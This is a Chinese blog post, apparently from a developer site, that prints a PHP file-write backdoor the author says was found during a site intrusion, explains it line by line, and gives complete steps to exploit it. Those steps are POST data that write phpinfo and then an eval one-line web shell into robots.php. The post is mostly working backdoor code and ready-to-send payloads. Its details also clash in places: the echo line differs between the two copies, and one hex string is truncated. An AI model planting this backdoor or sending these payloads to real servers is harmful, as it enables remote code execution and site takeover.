php%3e%3etxt_又一款超强PHP后门

这个后门是在渗透某站时遇到的,贴代码:

$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"];

$c = $_POST["z2"];

$buf = "";

for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2));

@fwrite(fopen($f, "w") , $buf);

echo "1ok";

?>

下面分析一下这个代码

$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; //定义$f等于根目录的物理路径+$_POST[z1]的内容

$c = $_POST["z2"]; // 定义$c 等于$_POST[z2]的内容

$buf = ""; //定义$buf等于空

for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2)); //for循环次数是 $c长度/2 , 每循环一次就把%xx这样的编码给解码

@fwrite(fopen($f, "w") , $buf); //写入文件地址是$f,内容是$buf,也就是解码后的。

echo "www.uedbox.com"; //仅仅是为了让作者或利用者辨别是否存在此PHP文件吧

?>

另外给出此后门的利用方式:

先把要写入的内容URL编码,比如:

编码后:

%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E

然后去掉里面的百分号(%)得到:

3C3F70687020706870696E666F28293B203F3

然后给后门POST内容:

z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E

可以看到phpinfo已经写入到根目录下的robots.php:

201405250905236941.jpg

一句话:<?php @eval($_REQUEST[a]); ?> 进行url编码后为:%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%52%45%51%55%45%53%54%5b%61%5d%29%3b%20%3f%3e,去掉%后为:3c3f70687020406576616c28245f524551554553545b615d293b203f3e。因此,要将一句话写入系统,POST的数据为:

z1=/robots.php&z2=3c3f70687020406576616c28245f524551554553545b615d293b203f3e

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值